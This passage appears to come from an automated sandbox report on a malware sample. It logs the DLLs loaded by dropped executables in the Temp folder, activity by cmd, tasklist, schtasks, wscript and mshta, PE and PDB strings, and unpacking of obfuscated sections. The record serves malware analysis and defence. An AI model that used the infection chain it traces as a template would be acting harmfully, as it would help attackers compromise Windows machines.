                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: mstask.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: dui70.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: duser.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: chartv.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: oleacc.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: atlthunk.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wtsapi32.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: winsta.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: windows.fileexplorer.common.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: explorerframe.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: shfolder.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: riched20.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: usp10.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: msls31.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\expand.exe Section loaded: cabinet.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: wsock32.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: napinsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: pnrpnsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: wshbth.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: nlaapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: winrnr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Section loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                                    Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe Section loaded: mskeyprotect.dll
                                    Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: random.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000008.00000002.1319444757.00000287A8E77000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Hpdbtem.pdbe- source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Portals.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.Windows.Forms.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: mscorlib.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Through.pdb source: mAtJWNv.exe.14.dr, mAtJWNv[1].exe.14.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb) source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: RegAsm.pdb source: RegAsm.exe.41.dr
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe.41.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Portals.pdbIL_STUB_PInvoke source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: random.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: random.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: random.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: random.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: random.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Unpacked PE file: 11.2.TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Unpacked PE file: 12.2.TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 13.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 14.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 22.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
